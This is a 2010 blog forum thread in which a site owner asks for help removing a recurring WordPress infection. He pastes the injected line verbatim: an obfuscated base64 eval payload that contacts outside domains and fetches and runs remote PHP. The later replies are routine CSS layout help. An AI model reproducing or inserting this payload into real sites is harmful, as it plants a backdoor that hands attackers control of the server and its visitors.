go41

How do you restore a site affected by the horrific eval base 64 virus?

von Joern am 14. Mai. 2010 | Keine Kommentare

Here is what my client wrote. Joern, please advise man.
Hi Omar,

It’s kinda hard for me to articulate via e-mail what exactly the problem is with my site, but I’m hoping between our discussion, your knowledge and the experts you have access to. I can get this issue resolved quickly.
My blog has been infected with the eval(base64_decode) virus and the following code below was added to every .php file I have.
<?php @eval(@base64_decode(‚aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7‘)); ?>
This is the third time that I’ve been infected with this virus and it’s clear that there is a security whole in my WordPress installation. I need help to make sure that all elements of this nasty code are removed from my site on a back end and front end level and to have my installation hardened to make sure this won’t happen again.
Typically the the virus messes up the GUI of the admin panel, kills my RSS feed and on occasion redirects my site. For whatever reason, the RSS feed still works and it doesn’t appear that the site is being redirected, but the GUI is still all messed up and traces of the bad code remain.
At this point it’s probably only a matter of scrubbing files, I just don’t know which ones to scrub as I’m not an expert.
Thanks for your help
Omar

(von: omerkhan01)

Hier noch 7 weitere Ergebnisse dieses Threads:

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14. Mai. 2010 (von: omerkhan01)

Oh yeah dude, I forgot to ask you.GO to my site again.at [/url]click hereSee how Hi there and the Twitter logo are aligned to the left of the DIV whereas the contact tab is to the right.How would you make…

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by Joern

14. Mai. 2010 (von: Joern)

about eval(@base64_decode ...your theme (I just downloaded it from binuth..) has out of the pack two files with 'eval' in the code, jquery-ui-personalized-1.5.2.packed.js and footer.phpwhat the jquery-ui-personalized-1.5.2.packed.js does I do not know,... Weiterlesen →

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14. Mai. 2010 (von: omerkhan01)

Okay so let me get this straightYou have two div tags in your code right.One for the div region, which you call div="jw-add-side"Like <div class="jw-add-side">In this one, you put another div for the imageslike, <div class="jw-add-side-img"><img src="abc.jpg"></div></div>Is that correct and…

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by Joern

14. Mai. 2010 (von: Joern)

no, leave the code in the template (footer.php?) as it is, or delete the text in there and put the link around twitter image as below:Code:<div class="jw-add-side"><a href="http://twitter.com/yourusername"><img width="25" height="25" title="yourusername" border="0" src="http://maaximummedia.byethost7.com/twitter.jpg" /></a></div>in this style calledCode:.jw-add-side {you have an…

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14. Mai. 2010 (von: omerkhan01)

Hey dude, this is what I got, as your suggestion..jw-add-side {background:none repeat scroll 0 0 #59B7FF;border:1px solid #FFFFFF;color:#FFFFFF;font-size:16px;height:160px;line-height:normal;position:fixed;right:0;top:100px;width:80px;}.jw-add-side img... Weiterlesen →

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by Joern

14. Mai. 2010 (von: Joern)

I gave you a new style above (gives just the image).jw-add-side {color:#FFFFFF;line-height:normal;position:fixed;right:0;top:100px;}if you want to keep the blue sample you can move the image inside with.jw-add-side img {margin-left:30px;margin-top:135p... Weiterlesen →

Re: How do you restore a site affected by the horrific eval base 64 virus? :: Reply by omerkhan01

14. Mai. 2010 (von: omerkhan01)

It worked. I had to clear my browser's cache. Thanks!Have a nice night Omar Weiterlesen →

Autor:

Du findest mich auch auf Twitter und Facebook!

Schreibe einen Kommentar

Pflichtfelder sind mit * markiert.


Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.

weitere forum Beiträge: